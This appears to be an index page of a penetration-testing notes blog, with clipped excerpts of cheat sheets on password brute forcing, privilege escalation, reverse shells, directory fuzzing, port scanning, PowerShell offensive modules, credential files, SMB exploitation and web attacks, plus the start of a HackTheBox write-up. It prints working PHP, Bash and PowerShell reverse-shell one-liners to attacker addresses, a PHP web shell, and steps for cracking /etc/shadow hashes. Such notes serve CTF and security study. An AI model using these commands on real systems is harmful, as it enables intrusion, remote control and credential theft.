BruteForcing

Table of Contents JohnTheRipper Medusa Online Resources Hydra Parator JohnTheRipper zip2john <zipfile> > <outputfile> john <hashfile> –fork=4 –wordlist=<wordlist> Medusa # brute forcing SSH login with usernames and passwords medusa -h <host-ip> -U <user-file> -P <passwd-file> -M ssh <host-ip> Online Resources Hash crack – CrackStation Hydra hydra -l <username> -P <pass-file> http://domain http-post-form "</login/path/>:<login-data>[username=^USER^&password=^PASS^]:<error-response>[Incorrect Username]" Parator…

PrivilegeEscalation

Table of Contents Linux Find SetUID Files Check User Privileges Interactive Programs with SUDO Privilege RottenPotato Kernel 2.6 LXD LXC Privilege Escalation Priv Escalation Through Sudoers Conf Exploit Suggester Rational Love VNC Linux Find SetUID Files find / -perm -4000 -type f 2>/dev/null Check User Privileges sudo -l -l Interactive Programs with SUDO Privilege sudo…

ReverseShell

Table of Contents PHP Reverse Shell Bash NetCat Net Cat CheetSheet Bat File PHP Reverse Shell php -r '$sock=fsockopen("10.0.0.1",4242);exec("/bin/sh -i <&3 >&3 2>&3");' php -r '$sock=fsockopen("10.0.0.1",4242);$proc=proc_open("/bin/sh -i", array(0=>$sock, 1=>$sock, 2=>$sock),$pipes);' /usr/share/webshells/php/php-reverse-shell.php # cmd execution <?php system($_REQUEST['mycmd']) ?> Bash bash -c 'bash -i >& /dev/tcp/<your_ip>/4444 0>&1' NetCat nc <host> <port> If in meterpreter shell: execute -f…

DirectoryFuzzing

Table of Contents Dirbuster Gobuster Dirsearch Wfuzz Other Useful Tools Dirbuster dirbuster -u -v -u <URL> -e <extensions> -l <wordlist> -r <report-location> Gobuster gobuster dir|dns <URL> -v -t <threads> -w <wordlist> Dirsearch dirsearch.py -u <URL> -e <extensions> -t <threads> -c <cookies> –proxy=<proxy> Wfuzz wfuzz -c -v –hc <status-code> -w <wordlist> <URL>/FUZZ/* Other Useful Tools Tons…

PortScan

Table of Contents Nmap Masscan Unicorn Scan Nmap nmap -A -T4 -p- -v -oN nmap.txt <host> Masscan masscan -p 1-65535 <host> -e <interface> –rate=<rate> Unicorn Scan us -mT -Iv <host>:<ports[a|]> -r <rate[3000|]> -R <round[3|]>

Powershell

Table of Contents Reverse Shell One liner PowerSploit Invoke-Shellcode Invoke-WmiMethod Get-Keystrokes Exfiltration/Out-Minidump.ps1 Exfiltration/Get-TimedScreenshot.ps1 Nishang Get-Information.ps1 Get-WLAN-Keys.ps1 StartListener.py Ps_encoder.py Get System Release ID Executing Command as Another User Get User ACL Go into Registry Mode Reverse Shell One liner $client = New-Object System.Net.Sockets.TCPClient("<LHOST>",<LPORT>);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName…

JuicyFiles

Table of Contents Linux Password Hash Files History Configuration Files Windows Coinfiguration Files Hash Files Windows System Info Linux Password Hash Files passwd, shadow Content – User passwod hashes Features – SHA256Crypt hash Location – /etc Handle – unshadow <passfile> <shadowfile> then hashcat or john History bash_history Content – bash history Features – may contain…

Services

Table of Contents Samba Enumeration Smbclient Crackmapexec Psexec_command or Usermap_script Msf Foothold MS_17_010 Psexec.py Psexec Msf Smb_login Msf DistCC Foothold CVE-2004-2687 Samba Enumeration Smbclient List all shares smbclient -L \\\\<URL>\\ Crackmapexec List all shares crackmapexec smb <ip> -u <username> -p <password> –shares Psexec_command or Usermap_script Msf Execute smb command auxiliary/admin/smb/psexec_command set COMMAND [command you want…

WebApplication

Table of Contents General Check List Initial Steps With Unprivileged User Account OWASP’s Guide HeartBleed Enumeration BurpSuite Dirbuster Gobuster Dirsearch Wfuzz PHP Info Page PHP Filter PHP Remote File Inclusion PHP Log Poisoning Wpscan Other Tools Foothold Identity Brute Forcing SQL Injection – URL SQL Injection – Web Form Directory Traversal XXE Injection Type Juggling…

0x0B-HackTheBox-Obscurity

Set up 目标机器在 10.10.10.168. Recon Nmap # Nmap 7.80 scan initiated Tue Apr 28 03:28:16 2020 as: nmap -A -T4 -p- -v -oN nmap.txt 10.10.10.168 adjust_timeouts2: packet supposedly had rtt of -935420 microseconds. Ignoring time. adjust_timeouts2: packet supposedly had rtt of -935420 microseconds. Ignoring time. adjust_timeouts2: packet supposedly had rtt of -1170053 microseconds. Ignoring time….